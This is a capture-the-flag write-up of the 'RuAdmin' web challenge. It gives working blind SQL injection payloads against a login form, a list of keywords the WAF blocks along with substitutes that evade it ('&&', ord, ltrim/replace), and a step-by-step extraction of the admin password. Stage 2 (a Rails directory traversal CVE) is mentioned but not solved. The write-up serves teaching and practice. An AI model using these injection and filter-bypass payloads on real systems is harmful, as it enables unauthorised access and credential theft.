Tags: web sqli 

Rating:

# ▼▼▼RuAdmin(1000points、2/123=1.6%)▼▼▼
**This writeup is written by [@kazkiti_ctf](https://twitter.com/kazkiti_ctf)**

## ▼Stage1: Blind SQL injection

### 【Identify the vulnerability】

POST `/sessions`

`username`=**'or'1'='0'#**&`password`=test   ⇒Login failed

`username`=**'or'1'='1'#**&`password`=test   ⇒Login success

**Blind SQL injection !!**

and

There was a statement that you should login with `admin`'s authority

and

redirect `/admin`

`/admin` has login function but **no vulnerability.**

---

### 【Attack scenario】

I will get admin's login information by Blind SQL injection at `/session` and login in at `/admin`.

---

### 【Identify the Database】

`username`=**'or''=''--**&`password`=test ⇒500エラー

`username`=**'or''=''--+**&`password`=test ⇒Login success

**MySQL !!**

---

### 【Identify the WAF】

```
username=like&password=a ⇒hacking detected( `like`)
username=REGEXP&password=s ⇒hacking detected( `regexp`)
username=mid&password=s ⇒hacking detected( `mid`)
username=STRCMP&password=s ⇒hacking detected( `STRCMP`)
username=INSTR&password=s ⇒hacking detected( `INSTR`)
username=POSITION&password=s     ⇒hacking detected( `POSITION`)
username=LOCATE&password=s ⇒hacking detected( `LOCATE`)
username=LPAD&password=s ⇒hacking detected( `LPAD`)
username=concat&password=s ⇒hacking detected( `concat`)
username=substr&password=s ⇒hacking detected( `substr`)
username=hex&password=s ⇒hacking detected( `hex`)
username=substr&password=s ⇒hacking detected( `substr`)
username=right&password=s ⇒hacking detected( `right`)
username=left&password=s ⇒hacking detected( `left`)
username=ascii&password=s ⇒hacking detected( `ascii`)
username=conv&password=s ⇒hacking detected( `conv`)
username=and&password=s   ⇒hacking detected( `and`)
username=information_schema.tables&password=s   ⇒hacking detected( `information_schema.tables`)
```

WAF

---

```
username=or&password=s ⇒username or password is invalid (I can use `or`)
username=in&password=s ⇒username or password is invalid (I can use `in`)
username=if&password=s ⇒username or password is invalid (I can use `if`)
username=length&password=s ⇒username or password is invalid (I can use `length`)
username=ord&password=s ⇒username or password is invalid (I can use `ord`)
username=%26%26&password=s ⇒username or password is invalid (I can use `&&`: Substitution of `and`)
```

OK

---

### 【Identify the number of data】

`username`='or id=0# ⇒ Login success!!

`username`='or id=1# ⇒ Login success!!

`username`='or id=2# ⇒ Login failed!!

`username`='or id>2# ⇒ Login failed!!

2 data !!

---

### 【Identify column names】

`username`='or+length(username)>1# ⇒Login success( `username`!!)

`username`='or+length(password)>1# ⇒Login success( `password`!!)

---

### 【Identify admin's username】

`username`='or id=1%26%26username='admin'#    ⇒Login success(id=1 is `admin`)

---

### 【Identify admin's password】

`username`='or+id=1%26%26length(password)=13#   ⇒Login success admin password is 13 letters

`username`='or+id=1%26%26ord(password)=73#    ⇒I

`username`='or+id=1%26%26ord(ltrim(replace(password,'I,'')))=95#   ⇒_

・・・~(abridgement)~

`username`='or+id=1%26%26ord(ltrim(replace(password,'I_l0v3_Applz','')))=95#  ⇒_

admin's password is `I_l0v3_Applz_`

---

### 【Login at /admin】

`username`=admin&`password`=I_l0v3_Applz_ ⇒Login success

---

## ▼Stage2 :Rails Asset Pipeline Directory Traversal Vulnerability (CVE-2018-3760)

### 【function】

There is upload function and display upload folder path

---

I can not solve stage 2...

I'd like to look forward to someone's writeup